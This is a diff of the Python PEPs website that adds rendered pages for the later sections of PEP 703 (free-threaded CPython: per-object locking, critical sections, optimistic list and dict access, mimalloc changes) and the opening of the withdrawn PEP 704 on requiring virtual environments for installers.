Per-object locks with critical sections provide weaker protections +than the GIL. Because the GIL doesn’t necessarily ensure that +concurrent operations are atomic or correct, the per-object locking +scheme also cannot ensure that concurrent operations are atomic or +correct. Instead, per-object locking aims for similar protections as +the GIL, but with mutual exclusion limited to individual objects.

+

Most operations on an instance of a container type require locking +that object. For example:

+
    +
  • list.append, list.insert, list.repeat, +PyList_SetItem
  • +
  • dict.__setitem__, PyDict_SetItem
  • +
  • list.clear, dict.clear
  • +
  • list.__repr__, dict.__repr__, etc.
  • +
  • list.extend(iterable)
  • +
  • setiter_iternext
  • +
+

Some operations operate directly on two container objects, with +knowledge about both containers’ internal structure. For example, +there are internal specializations of list.extend(iterable) for +specific iterable types, like set. These operations need to lock +both container objects because they access the internals of both +objects simultaneously. Note that the generic implementation of +list.extend only needs to lock one object (the list) because the +other object is accessed indirectly through the thread-safe iterator +API. Operations that lock two containers are:

+
    +
  • list.extend(list), list.extend(set), list.extend +(dictitems), and other specializations where the implementation +is specialized for argument type.
  • +
  • list.concat(list)
  • +
  • list.__eq__(list), dict.__eq__(dict)
  • +
+

Some simple operations can be implemented directly with atomic +accesses and do not need locks because they only access a single +field. These operations include:

+
    +
  • len(list) i.e., list_length(PyListObject *a)
  • +
  • len(dict)
  • +
  • len(set)
  • +
+

A select few operations optimistically avoid locking to improve +performance. These require special implementations and cooperation +from the memory allocator:

+
    +
  • list[idx] (list_subscript)
  • +
  • dict[key] (dict_subscript)
  • +
  • listiter_next, dictiter_iternextkey/value/item
  • +
  • list.contains
  • +
+
+

Borrowed References

+

Per-object locking provides many of the important protections that the +GIL provides, but there are a few cases where it’s not sufficient. +For example, code that relies on upgrading a borrowed reference to +an “owned” reference may be unsafe in certain circumstances:

+
PyObject *item = PyList_GetItem(list, idx);
+Py_INCREF(item);
+
+
+

The GIL ensures that no other thread can modify the list in between +the access and the Py_INCREF call. Without the GIL – even with +per-object locking – another thread might modify the list leading to +item being freed between the access and the Py_INCREF call.

+

The problematic borrowed reference APIs are supplemented with +functions that return “new references” but are otherwise +equivalent:

+
    +
  • PyList_FetchItem(list, idx) for PyList_GetItem
  • +
  • PyDict_FetchItem(dict, key) for PyDict_GetItem
  • +
  • PyWeakref_FetchObject for PyWeakref_GetObject
  • +
+

Note that some APIs that return borrowed references, such as +PyTuple_GetItem, are not problematic because tuples are +immutable. Similarly, not all uses of the above APIs are problematic. +For example, PyDict_GetItem is often used for parsing keyword +argument dictionaries in function calls; those keyword argument +dictionaries are effectively private (not accessible by other +threads).

+
+
+

Python Critical Sections

+

Straightforward per-object locking could introduce deadlocks that were +not present when running with the GIL. Threads may hold locks for +multiple objects simultaneously because Python operations can nest. +Operations on objects can invoke operations on other objects, +acquiring multiple per-object locks. If threads try to acquire the +same locks in different orders, they will deadlock.

+

This PEP proposes a scheme called “Python critical sections” to +implicitly release per-object locks to avoid deadlocks. To +understand the scheme, we first introduce a general approach to avoid +deadlocks, and then propose a refinement of that approach with better +performance.

+

One way to avoid deadlocks is to allow threads to hold only the lock +(or locks) for a single operation at a time (typically a single lock, +but some operations involve two locks as described above). When a +thread begins a nested operation it should suspend the locks for any +outer operation: before beginning the nested operation, the locks for +the outer operation are released and when the nested operation +completes, the locks for the outer operation are reacquired.

+

Additionally, the locks for any active operation should be suspended +around potentially blocking operations, such as I/O (i.e., operations +that would have released the GIL). This is because the interaction +between locks and blocking operations can lead to deadlocks in the +same way as the interaction between multiple locks.

+

To improve performance, this PEP proposes a variation of the above +scheme that still avoids deadlocks. Instead of immediately +suspending locks any time a nested operation begins, locks are only +suspended if the thread would block (i.e., would have released the +GIL). This reduces the number of lock acquisitions and releases for +nested operations, while avoiding deadlocks.

+

The proposed API for Python critical sections are the following four +macros. These are intended to be public (usable by C-API extensions), +but not part of the limited API:

+
    +
  • Py_BEGIN_CRITICAL_SECTION(PyObject *op);: +Begins a critical section by acquiring the mutex for the referenced +object. If the object is already locked, then locks for any +outstanding critical sections are released before this thread waits +for referenced object to be unlocked.
  • +
  • Py_END_CRITICAL_SECTION;: +Ends the most recent operation, unlocking the mutex. The next +most recent previous critical section (if any) is resumed if it is +currently suspended.
  • +
  • Py_BEGIN_CRITICAL_SECTION2(PyObject *a, PyObject *b);: +Begins a critical section by acquiring the mutexes for two objects. +To ensure consistent lock ordering, the order of acquisition is +determined by memory address (i.e., the mutex with lower memory +address is acquired first). If either mutex is already locked, then +locks for any outstanding critical sections are released before this +thread waits for the referenced objects to be unlocked.
  • +
  • Py_END_CRITICAL_SECTION2;: +Behaves the same as Py_END_CRITICAL_SECTION but unlocks two +objects.
  • +
+

Additionally, when a thread transitions from the ATTACHED state to +the DETACHED state, it should suspend any active critical +sections. When transitioning from DETACHED to ATTACHED, the +most recent suspended critical section, if any, should be resumed.

+

Note that operations that lock two containers simultaneously need to use +the Py_BEGIN_CRITICAL_SECTION2 macro. It is not sufficient to nest +two calls to Py_BEGIN_CRITICAL_SECTION because the inner critical +section may release the locks from the outer critical section.

+
+
+

Optimistically Avoiding Locking

+

A few operations on dict and list optimistically avoid +acquiring the per-object locks. They have a fast path operation that +does not acquire locks, but may fall back to a slower operation that +acquires the dictionary’s or list’s lock when another thread is +concurrently modifying that container.

+

The operations with an optimistic fast path are:

+
    +
  • PyDict_FetchItem/GetItem and dict.__getitem__
  • +
  • PyList_FetchItem/GetItem and list.__getitem__
  • +
+

Additionally, iterators for dict and list use the above +functions so they also optimistically avoid locking when returning +the next item.

+

There are two motivations for avoiding lock acquisitions in these +functions. The primary reason is that it is necessary for scalable +multi-threaded performance even for simple applications. Dictionaries +hold top-level functions in modules and methods for classes. These +dictionaries are inherently highly shared by many threads in +multi-threaded programs. Contention on these locks in multi-threaded +programs for loading methods and functions would inhibit efficient +scaling in many basic programs.

+

The secondary motivation for avoiding locking is to reduce overhead +and improve single-threaded performance. Although lock acquisition +has low overhead compared to most operations, accessing individual +elements of lists and dictionaries are fast operations (so the +locking overhead is comparatively larger) and frequent (so the +overhead has more impact).

+

This section describes the challenges with implementing dictionary and +list accesses without locking followed by a description of this PEP’s +changes to the Python interpreter required to address those +challenges.

+

The main challenge is that retrieving an item from a list or +dictionary and incrementing the reference count of that item is not +an atomic operation. In between the time the item is retrieved and +the reference count is incremented, another thread may modify the +list or dictionary, possibly freeing the memory for the previously +retrieved item.

+

A partial attempt at addressing this issue would be to convert the +reference count increment to a conditional increment, only +incrementing the reference count if it’s not zero. This change is +not sufficient because when a Python object’s reference count reaches +zero, the object’s destructor is called and the memory storing the +object may be re-used for other data structures or returned to the +operating system. Instead, this PEP proposes a technique to ensure +that the reference count fields remain valid for the duration of the +access, so that the conditional reference count increment is safe. +This technique requires cooperation from the memory allocator +(mimalloc) as well as changes to the list and dictionary objects. The +proposed technique is similar to read-copy update (RCU) [6], a +synchronization mechanism widely used in the Linux kernel.

+

The current implementation of list_item (the C function +implementing list.__getitem__) is the following:

+
Py_INCREF(a->ob_item[i]);
+return a->ob_item[i];
+
+
+

The proposed implementation uses the conditional increment +(_Py_TRY_INCREF) and has additional checks:

+
 PyObject **ob_item = atomic_load(&a->ob_item);
+ PyObject *item = atomic_load(&ob_item[i]);
+ if (!item || !_Py_TRY_INCREF(item)) goto retry;
+ if (item != atomic_load(&ob_item[i])) {
+   Py_DECREF(item);
+   goto retry;
+ }
+ if (ob_item != atomic_load(&a->ob_item)) {
+   Py_DECREF(item);
+   goto retry;
+}
+return item;
+
+
+

The “retry” subroutine implements the locked fallback path when +concurrent modifications to the list cause the above fast, +non-locking path to fail:

+
retry:
+  PyObject *item;
+  Py_BEGIN_CRITICAL_SECTION(a->ob_mutex);
+  item = a->ob_item[i];
+  Py_INCREF(item);
+  Py_END_CRITICAL_SECTION(a->ob_mutex);
+  return item;
+
+
+

The modifications to the dict implementation are similar, because +the relevant parts of both list and dictionary retrieval involve +loading an item/value from an array at a known index.

+

The additional checks following the conditional increment are +necessary because the scheme allows immediate re-use of memory, +including the memory that previously held a PyObject structure or +list or dict array. Without these extra checks, the function +might return a Python object that was never in the list, if the +memory occupied by the Python object previously held a different +PyObject whose memory previously stored an item in the list.

+
+
+

Mimalloc Changes for Optimistic list and dict Access

+

The implementation requires additional constraints to the memory +allocator, including some changes to the mimalloc code. Some +background on mimalloc’s implementation is helpful to understand the +required changes. Individual allocations from mimalloc are +called “blocks.” Mimalloc “pages” contain consecutive blocks that +are all the same size. A mimalloc “page” is similar to +a “superblock” in other allocators; it is NOT an operating system +page. A mimalloc “heap” contains pages of various size classes; each +page belongs to a single heap. If none of the blocks of a page are +allocated, then mimalloc may re-use the page for a different size +class or different heap (i.e., it might reinitialize the page).

+

The list and dictionary access scheme works by partially restricting +re-use of mimalloc pages so that reference count fields remains valid +for the duration of the access. The restricted re-use of mimalloc +pages is enforced by having separate heaps for Python objects +[7]. This ensures that even if an item is freed during access +and the memory reused for a new object, the new object’s reference +count field is placed at the same location in memory. The reference +count field remains valid (or zero) across allocations.

+

Python objects that support Py_TPFLAGS_MANAGED_DICT have their +dictionary and weak reference fields preceding the PyObject +header, so their reference count fields are at a different offset from +the start of their allocations. They are stored in a separate mimalloc +heap. Additionally, non-GC objects are stored in their own heap so +that the GC only has to look at GC objects. There are therefore three +mimalloc heaps for Python objects, one for non-GC objects, one for GC +objects with managed dictionaries, and one for GC objects without +managed dictionaries.

+
+
+

Mimalloc Page Reuse

+

It is beneficial to keep the restrictions on mimalloc page reuse to a +short period of time to avoid increasing overall memory usage. +Precisely limiting the restrictions to list and dictionary accesses +would minimize memory usage, but would require expensive +synchronizations. At the other extreme, keeping the restrictions +until the next GC cycle would avoid introducing any extra +synchronizations, but would potentially increase memory usage.

+

This PEP proposes a system that lies between those two extremes based +on FreeBSD’s “GUS” [8]. It uses a combination of global and +per-thread counters (or “sequence numbers”) to coordinate the +determination of when it is safe to reuse an empty mimalloc page for +a different heap or for a different size class, or to return it to +the operating system:

+
    +
  • There is a global write sequence number that monotonically +increases.
  • +
  • When a mimalloc page is empty, it’s tagged with the current write +sequence number. The thread may also atomically increment the +global write sequence number.
  • +
  • Each thread has a local read sequence number that records the most +recent write sequence number it has observed.
  • +
  • Threads may observe the write sequence number whenever they are not +in a list or dictionary access. The reference implementation does +this in mimalloc’s slow-path allocation function. This is called +regularly enough to be useful, but not so frequently as to +introduce significant overhead.
  • +
  • There is a global read sequence number that stores the minimum of +all active threads’ read sequence numbers. A thread may update the +global read sequence number by scanning each threads’ local read +sequence number. The reference implementation does this before +allocating a fresh mimalloc page if there are restricted pages +that could possibly be reused.
  • +
  • An empty mimalloc page may be reused for a different heap or size +class when the global read sequence number is larger than the +page’s tag number.
  • +
+

The condition that the global read sequence number is larger than the +page’s tag is sufficient because it ensures that any thread that had +a concurrent optimistic list or dictionary access is finished with +that access. In other words, there are no threads accessing the +empty blocks in the freed page, so the page can be used for any other +purpose or even returned to the operating system.

+
+
+

Optimistic dict and list Access Summary

+

This PEP proposes a technique for thread-safe list and dictionary +accesses that typically avoids acquiring locks. This reduces +execution overhead and avoids some multi-threaded scaling bottlenecks +in common operations, like calling functions and methods. The scheme +works by placing temporary restrictions on mimalloc page reuse to +ensure that objects’ reference count fields remain valid after +objects are freed so that conditional reference count increment +operations are safe. The restrictions are placed on mimalloc pages +instead of on individual objects to improve opportunities for memory +reuse. The restrictions are lifted as soon as the system can +determine that there are no outstanding accesses involving the empty +mimalloc page. To determine this, the system uses a combination of +lightweight per-thread sequence counters and also tags pages when +they are empty. Once each thread’s local counter is larger than the +page’s tag, it can be reused for any purpose or returned to the +operating system. The restrictions are also lifted whenever the +cyclic garbage collector runs because the stop-the-world pause +ensures that threads do not have any outstanding references to empty +mimalloc pages.

+
+
+
+

Specializing Interpreter

+

The specializing interpreter requires some changes to be thread-safe +when running without the GIL:

+
    +
  • Concurrent specializations are prevented by using a mutex. This +prevents multiple threads writing to the same inline cache.
  • +
  • In multi-threaded programs running without the GIL, each bytecode is +only specialized once. This prevents a thread from reading a +partially written inline cache.
  • +
  • Locking also ensures that cached values of tp_version_tag and +keys_version are consistent with the cached descriptors and other +values.
  • +
  • Modifications to inline counters use “relaxed atomics”. In other +words, some counter decrements may be missed or overwritten, but that +does not affect correctness.
  • +
+
+
+

Py_mod_gil Slot

+

In --disable-gil builds, when loading an extension, CPython will +check for a new PEP 489-style Py_mod_gil slot. If the slot is +set to Py_mod_gil_not_used, then extension loading proceeds as +normal. If the slot is not set, the interpreter pauses all threads and +enables the GIL before continuing. Additionally, the interpreter will +issue a visible warning naming the extension, that the GIL was enabled +(and why) and the steps the user can take to override it.

+
+
+

PYTHONGIL Environment Variable

+

In --disable-gil builds, the user can also override the behavior at +runtime by setting the PYTHONGIL environment variable. Setting +PYTHONGIL=0, forces the GIL to be disabled, overriding the module +slot logic. Setting PYTHONGIL=1, forces the GIL to be enabled.

+

The PYTHONGIL=0 override is important because extensions that are +not thread-safe can still be useful in multi-threaded applications. For +example, one may want to use the extension from only a single thread or +guard access by locks. For context, there are already some extensions +that are not thread-safe even with the GIL, and users already have to +take these sorts of steps.

+

The PYTHONGIL=1 override is sometimes useful for debugging.

+
+
+
+

Rationale

+
+

Non-Generational Garbage Collection

+

This PEP proposes switching from a generational cyclic garbage +collector to a non-generational collector (when CPython is built +without the GIL). That is equivalent to only having one generation +(the “old” generation). There are two reasons for this proposed +change.

+

Cyclic garbage collection, even for just the young generation, +requires pausing other threads in the program. The author is +concerned that frequent collections of the young generation would +inhibit efficient scaling in multi-threaded programs. This is a +concern for young generations (but not the old generation) because +the young generations are collected after a fixed number of +allocations, while the collections for the older generation are +scheduled in proportion to the number of live objects in the heap. +Additionally, it is difficult to efficiently keep track of objects in +each generation without the GIL. For example, CPython currently uses +a linked list of objects in each generation. If CPython were to keep +that design, those lists would need to be made thread-safe, and it’s +not clear how to do that efficiently.

+

Generational garbage collection is used to good effect in many other +language runtimes. For example, many of the Java HotSpot garbage +collector implementations use multiple generations [11]. In +these runtimes, a young generation is frequently a throughput win: +since a large percentage of the young generation is typically “dead,” +the GC is able to reclaim a large amount memory relative to the +amount of work performed. For example, several Java benchmarks show +over 90% of “young” objects are typically collected [12] +[13]. This is commonly referred to as the “weak +generational hypothesis;” the observation is that most objects die +young. This pattern is reversed in CPython due to the use of +reference counting. Although most objects still die young, they are +collected when their reference counts reach zero. Objects that +survive to a garbage collection cycle are most likely to remain +alive [14]. This difference means that generational +collection is much less effective in CPython than in many other +language runtimes [15].

+
+
+

Optimistic Avoiding Locking in dict and list Accesses

+

This proposal relies on a scheme that mostly avoids acquiring locks +when accessing individual elements in lists and dictionaries. Note +that this is not “lock free” in the sense of “lock-free” +and “wait-free” algorithms that guarantee forward progress. It +simply avoids acquiring locks (mutexes) in the common case to improve +parallelism and reduce overhead.

+

A much simpler alternative would be to use reader-writer locks to +protect dictionary and list accesses. Reader-writer locks allow +concurrent reads, but not updates, which might seem ideal for list +and dictionaries. The problem is that reader-writer locks have +substantial overhead and poor scalability, particularly when the +critical sections are small, as they are for single-element +dictionary and list accesses [9]. The poor reader +scalability stems from the fact that readers must all update the same +data structure, such as the number of readers in +pthread_rwlocks.

+

The technique described in this PEP is related to RCU +(“read-copy-update”) [6] and, to a lesser extent, hazard +pointers, two well-known schemes for optimizing concurrent, +read-mostly data structures. RCU is widely used in the Linux kernel +to protect shared data structures in a scalable manner. Both the +technique in this PEP and RCU work by deferring reclamation while +readers may be accessing the concurrent data structure. RCU is most +commonly used to protect individual objects (like hash tables or +linked lists), while this PEP proposes a scheme to protect larger +blocks of memory (mimalloc “pages”) [10].

+

The need for this scheme is largely due to the use of reference +counting in CPython. If CPython only relied on a tracing garbage +collector, then this scheme would probably not be necessary because +tracing garbage collectors already defer reclamation in the required +manner. This would not “solve” scaling issues, but would shift many +of the challenges to the garbage collector implementation.

+
+
+
+

Backwards Compatibility

+

This PEP poses a number of backwards compatibility issues when +building CPython with the --disable-gil flag, but those issues do +not occur when using the default build configuration. Nearly all the +backwards compatibility concerns involve the C-API:

+
    +
  • CPython builds without the GIL will not be ABI compatible with the +standard CPython build or with the stable ABI due to changes to the +Python object header needed to support biased reference counting. +C-API extensions will need to be rebuilt specifically for this +version.
  • +
  • C-API extensions that rely on the GIL to protect global state or +object state in C code will need additional explicit locking to +remain thread-safe when run without the GIL.
  • +
  • C-API extensions that use borrowed references in ways that are not +safe without the GIL will need to use the equivalent new APIs that +return non-borrowed references. Note that only some uses of +borrowed references are a concern; only references to objects that +might be freed by other threads pose an issue.
  • +
  • Custom memory allocators (PyMem_SetAllocator) are required to +delegate the actual allocation to the previously set allocator. For +example, the Python debug allocator and tracing allocators will +continue to work because they delegate the allocation to the +underlying allocator. On the other hand, wholesale replacing of the +allocator (e.g., with jemalloc or tcmalloc) will not work +correctly.
  • +
  • Python objects must be allocated through the standard APIs, such as +PyType_GenericNew or PyObject_Malloc. Non-Python objects +must not be allocated through those APIs. For example, it is +currently acceptable to allocate buffers(non-Python objects) +through PyObject_Malloc; that will no longer be allowed and +buffers should instead be allocated through PyMem_Malloc, +PyMem_RawMalloc, or malloc.
  • +
+

There are fewer potential backwards compatibility issues for Python +code:

+
    +
  • Destructors and weak reference callbacks for code objects and +top-level function objects are delayed until the next cyclic +garbage collection due to the use of deferred reference counting.
  • +
  • Destructors for some objects accessed by multiple threads may be +delayed slightly due to biased reference counting. This is rare: +most objects, even those accessed by multiple threads, are +destroyed immediately as soon as their reference counts are zero. +Two places in the Python standard library tests required +gc.collect() calls to continue to pass.
  • +
+
+
+

Distribution

+

This PEP poses new challenges for distributing Python. At least for +some time, there will be two versions of Python requiring separately +compiled C-API extensions. It may take some time for C-API extension +authors to build --disable-gil compatible packages and upload +them to PyPI. Additionally, some authors may be hesitant to support +the --disable-gil mode until it has wide adoption, but adoption +will likely depend on the availability of Python’s rich set of +extensions.

+

To mitigate this, the author will work with Anaconda to distribute +a --disable-gil version of Python together with compatible +packages from conda channels. This centralizes the challenges of +building extensions, and the author believes this will enable more +people to use Python without the GIL sooner than they would otherwise +be able to.

+
+
+

Performance

+

The changes to make CPython thread-safe without the GIL increase +execution overhead for --disable-gil builds. The performance +impact is different for programs that use only a single thread compared +to programs that use multiple threads, so the table below reports +execution overhead separately for these types of programs separately.

+ + + + + + + + + + + + + + + + + + +
Execution Overhead on pyperformance 1.0.6
Intel SkylakeAMD Zen 3
One thread6%5%
Multiple threads8%7%
+

The baseline used to measure overhead is 018be4c from PR 19474, +which implements immortal objects for Python 3.12. The largest +contribution to execution overhead is biased reference counting +followed by per-object locking. For thread-safety reasons, an +application running with multiple threads will only specialize a given +bytecode once; this is why the overhead for programs that use multiple +threads is larger compared to programs that only use one thread. +However, with the GIL disabled, programs that use multiple threads +should also be able to more effectively use multiple CPU cores.

+

Note that this PEP would not affect the performance of the default +(non --disable-gil) builds of CPython.

+
+
+

Build Bots

+

The stable build bots will also include --disable-gil builds.

+
+
+

How to Teach This

+

As part of implementing the --disable-gil mode, the author will +write a “HOWTO” guide [18] for making packages compatible when +running Python without the GIL.

+
+
+

Reference Implementation

+

There are two GitHub repositories implementing versions of CPython +without the GIL:

+ +

The nogil-3.12 is based on Python 3.12.0a4. It is useful for +evaluating single-threaded execution overhead and as a reference +implementation for this PEP. It is less useful for evaluating C-API +extension compatibility because many extensions are not currently +compatible with Python 3.12. Due to limited time for the 3.12 port, +the nogil-3.12 implementation does not skip all deferred reference +counts. As a temporary work around, the implementation immortalizes +objects that use deferred reference counting in programs that spawn +multiple threads.

+

The nogil repository is based on Python 3.9.10. It is useful for +evaluating multi-threading scaling in real world applications and +extension compatibility. It is more stable and well tested than the +nogil-3.12 repository.

+
+
+

Alternatives

+

Python currently supports a number of ways to enable parallelism, but +the existing techniques come with significant limitations.

+
+

Multiprocessing

+

The multiprocessing library allows Python programs to start and +communicate with Python subprocesses. This allows for parallelism +because each subprocess has its own Python interpreter (i.e., there’s +one GIL per process). Multiprocessing has a few substantial +limitations. Communication between processes is limited: objects +generally need to be serialized or copied to shared memory. This +introduces overhead (due to serialization) and complicates building +APIs on top of multiprocessing. Starting a subprocess is also more +expensive than starting a thread, especially with the “spawn” +implementation. Starting a thread takes ~100 µs, while spawning a +subprocess takes ~50 ms (50,000 µs) due to Python re-initialization.

+

Finally, many C and C++ libraries support access from multiple +threads but do not support access or use across multiple processes.

+
+
+

Releasing the GIL in C-API Extensions

+

C-API extensions can release the GIL around long running functions. +This allows for some degree of parallelism, since multiple threads +can run concurrently when the GIL is released, but the overhead of +acquiring and releasing the GIL typically prevents this from scaling +efficiently beyond a few threads. Many scientific computing +libraries release the GIL in computational heavy functions, and the +CPython standard library releases the GIL around blocking I/O.

+
+
+

Internal Parallelization

+

Functions implemented in C may use multiple threads internally. For +example, Intel’s NumPy distribution, PyTorch, and TensorFlow all use +this technique to internally parallelize individual operations. This +works well when the basic operations are large enough to be +parallelized efficiently, but not when there are many small +operations or when the operations depend on some Python code. Calling +into Python from C requires acquiring the GIL – even short snippets +of Python code can inhibit scaling.

+
+
+ +
+

Rejected Ideas

+
+

Why Not Use a Concurrent Garbage Collector?

+

Many recent garbage collectors are mostly concurrent – they avoid long +stop-the-world pauses by allowing the garbage collector to run +concurrently with the application. So why not use a concurrent +collector?

+

Concurrent collection requires write barriers (or read barriers). The +author is not aware of a way to add write barriers to CPython without +substantially breaking the C-API.

+
+
+

Why Not Deprecate PyDict_GetItem in Favor of PyDict_FetchItem?

+

This PEP proposes a new API PyDict_FetchItem which behaves like +PyDict_GetItem, but returns a new reference instead of a borrowed +reference. As described in Borrowed References, some uses of +borrowed references that were safe when running with the GIL are +unsafe when running without the GIL and need to be replaced by +functions like PyDict_FetchItem that return new references.

+

This PEP does not propose deprecating PyDict_GetItem and similar +functions that return borrowed references for a few reasons:

+
    +
  • Many of the uses of borrowed references are safe, even when running +without the GIL. For example, C API functions often use +PyDict_GetItem to retrieve items from the keyword +argument dictionary. These calls are safe because the keyword +argument dictionary is only visible to a single thread.
  • +
  • I tried this approach early on and found that wholesale replacing of +PyDict_GetItem with PyDict_FetchItem frequently introduced +new reference counting bugs. In my opinion, the risk of +introducing new reference counting bugs generally outweighs the +risks of missing a PyDict_GetItem call that is unsafe without +the GIL.
  • +
+
+
+

Why Not Use PEP 683 Immortalization?

+

Like PEP 683, this PEP proposes an immortalization scheme for +Python objects, but the PEPs use different bit representations to +mark immortal objects. The schemes cannot be identical because this +PEP depends on biased reference counting, which has two reference +count fields instead of one.

+
+
+
+

Open Issues

+
+

Improved Specialization

+

The Python 3.11 release introduced quickening and specialization as part +of the faster CPython project, substantially improving performance. +Specialization replaces slow bytecode instructions with faster +variants [19]. To maintain thread-safety, applications that use +multiple threads (and run without the GIL) will only specialize each +bytecode once, which can lower performance on some programs. It is +possible to support specializing multiple times, but that requires more +investigation and is not part of this PEP.

+
+
+

Python Build Modes

+

This PEP introduces a new build mode (--disable-gil) that is not +ABI compatible with the standard build mode. The additional build +mode adds complexity for both Python core developers and extension +developers. The author believes a worthwhile goal is to combine +these build modes and have the global interpreter lock controlled at +runtime, possibly disabled by default. The path to this goal remains +an open issue, but a possible path might look like the following:

+
    +
  1. In 2024, CPython 3.13 is released with support for a +--disable-gil build time flag. There are two ABIs for +CPython, one with the GIL and one without. Extension authors +target both ABIs.
  2. +
  3. After 2–3 releases, (i.e., in 2026–2027), CPython is released +with the GIL controlled by a runtime environment variable or +flag. The GIL is enabled by default. There is only a single ABI.
  4. +
  5. After another 2–3 release (i.e., 2028–2030), CPython switches to +the GIL being disabled by default. The GIL can still be enabled +at runtime via an environment variable or command line flag.
  6. +
+

This PEP covers the first step, with the remaining steps left as open +issues. In this scenario, there would be a two to three year period +where extension authors would target an extra CPython build per +supported CPU architecture and OS.

+
+
+

Integration

+

The reference implementation changes approximately 15,000 lines of code +in CPython and includes mimalloc, which is also approximately 15,000 +lines of code. Most changes are not performance sensitive and can be +included in both --disable-gil and the default builds. Some +macros, like Py_BEGIN_CRITICAL_SECTION will be no-ops in the +default build. Thee author does not expect a huge number of #ifdef +statements to support the --disable-gil builds.

+
+
+

Mitigations for Single-Threaded Performance

+

The changes proposed in the PEP will increase execution overhead for +--disable-gil builds compared to Python builds with the GIL. In +other words, it will have slower single-threaded performance. There +are some possible optimizations to reduce execution overhead, +especially for --disable-gil builds that only use a single +thread. These may be worthwhile if a longer term goal is to have a +single build mode, but the choice of optimizations and their +trade-offs remain an open issue.

+
+
+
+

References

+ +
+
+

Acknowledgments

+

Thanks to Hugh Leather, Łukasz Langa, and Eric Snow for providing +feedback on drafts of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0703.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0704/index.html b/pep-0704/index.html new file mode 100644 index 00000000000..e31fb1a406f --- /dev/null +++ b/pep-0704/index.html @@ -0,0 +1,312 @@ + + + + + + + + PEP 704 – Require virtual environments by default for package installers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 704 – Require virtual environments by default for package installers

+
+
Author:
+
Pradyun Gedam <pradyunsg at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Jan-2023
+
Post-History:
+
16-Jan-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP recommends that package installers like pip require a virtual environment by default on Python 3.13+.

+
+
+

PEP Withdrawal

+

During discussion of this PEP, it became clear that changes to pip’s UX are not controlled by PEPs as proposed. It also became clear that a significant number of users rely on being able to mix managed-by-pip dependencies with managed-by-some-other-tool dependencies (most prominently, when using Conda).

+

Further, a significant subset of the benefits of the proposed change are achievable via PEP 668 (accepted and implemented at the time of writing). It provides redistributors of the Python interpreter control over whether users should be required to use a virtual environment, what the messaging presented to the user is and how the rollout of that change should happen for their users.

+

Since enforcement of virtual environments with pip was the primary focus of this PEP, it felt more appropriate to withdraw this PEP than to refocus it on a different topic.

+

A future PEP to resolve the virtual environment naming convention question/issues would still be appropriate, but it’s worth starting any such effort as a fresh PEP focused on the benefits of such a convention, rather than on the enforcement of it.

+
+
+

Motivation

+

Python virtual environments are an essential part of the development workflow for Python. However, they require extra effort since they are an opt-in feature, and requires users to either:

+
    +
  • take explicit steps to activate/deactivate a virtual environment
  • +
  • use <path-to-venv>/<bin-path>/<executable> to run files
  • +
+

For new users, things will seemingly work correctly when virtual environments are not used -— until they don’t. Further, activating a virtual environment uses slightly different syntax and mechanisms on different platforms. This complicates the introduction to virtual environments, since now information and context about how/why they are useful needs to explained to justify adding additional steps to the workflow.

+

It also creates a scope for mistakes, since users need to remember to activate the virtual environment before running an installer like pip or configure those installers to error out. On certain Linux distributions, forgetting to do so can result in the installer modifying files that are owned by the operating system (which is partially mitigated by PEP 668 for distributions that opt-in to marking their environments accordingly).

+
+
+

Rationale

+

Changing the default behaviour of installers like pip to require a virtual environment to be active would:

+
    +
  • make it easier for new users to get started with Python (since there’s a consistent experience and virtual environments are understood as a thing you’re required to use)
  • +
  • reduce the scope for accidental installation issues for all users by default (by explicitly flagging when you’re not using a virtual environment).
  • +
+

Setting up a convention of placing the virtual environment in-tree in a directory named .venv removes a decision point for common workflows and creates a clear convention within the ecosystem.

+
+
+

Specification

+
+

Requiring a virtual environment by default

+

When a user runs an installer without an active virtual environment, the installer SHOULD print an error message and exit with a non-zero exit code.

+

The error message SHOULD inform the user that a virtual environment is required, SHOULD provide shell-specific instructions on how to create and activate a virtual environment named .venv, and SHOULD provide a link to a documentation page that explains how to create and activate a virtual environment.

+

See Implementation Notes for more details.

+
+
+

Opting out of virtual environments

+

The installer SHOULD also provide a explicit opt-in to disable this requirement, allowing an end user to use it outside of a virtual environment. If the installer does not provide this functionality, it SHOULD mention this in the error message and documentation page.

+
+
+

Consistent timeline for the change

+

Installers MAY choose to implement this default behaviour on any Python versions, but SHOULD implement it on Python 3.13 or newer.

+
+
+
+

Backwards Compatibility

+

This PEP is backwards incompatible with workflows where users are using installers outside of virtual environments. Such users will be prompted with an error message and will need to either:

+
    +
  • explicitly opt-in to running the installer outside of a virtual environment, or
  • +
  • create and use a virtual environment
  • +
+

Users who are already using virtual environments will not be affected by this change.

+

Workflow tools (which manage virtual environments for the user, under the hood) should be unaffected, since they should already be using a virtual environment for running the installer.

+
+
+

Security Implications

+

This PEP does not introduce any new security implications.

+
+
+

How to Teach This

+

This PEP requires that new users create and use a virtual environment to get started with using Python packages. This is, however, a best practice, as demonstrated by the section on “basics of how to install Python packages” in the Python Packaging User Guide, which explains how/what virtual environments are before discussing using pip.

+
+
+

Reference Implementation

+

There is no reference implementation for this PEP. However, the proposed behaviour is largely already implemented in pip and can be activated by setting the PIP_REQUIRE_VENV environment variable to 1. (Leaving it unset results in the proposed opt-in behaviour of not requiring a virtual environment for installation.)

+
+
+

Implementation Notes

+
+

Detecting an active virtual environment

+

As discussed in PEP 668, the logic for robustly detecting a virtual environment is something like:

+
def is_virtual_environment():
+    return sys.base_prefix != sys.prefix or hasattr(sys, "real_prefix")
+
+
+
+
+

Documentation on using a virtual environment

+

Package installers are expected to provide a link to a documentation page in the error message.

+

Ideally, such a documentation page would explain what virtual environments are, why they are required, and how to create and activate a virtual environment using venv. It should include instructions for the most common shells and platforms.

+

Such a documentation page should be made available in the Python Packaging User Guide to reduce duplicated effort across installers for covering this topic.

+
+
+
+

Rejected Ideas

+
+

Do not specify a name for the virtual environment directory

+

Using a consistent name for the virtual environment directory is important for a few reasons:

+
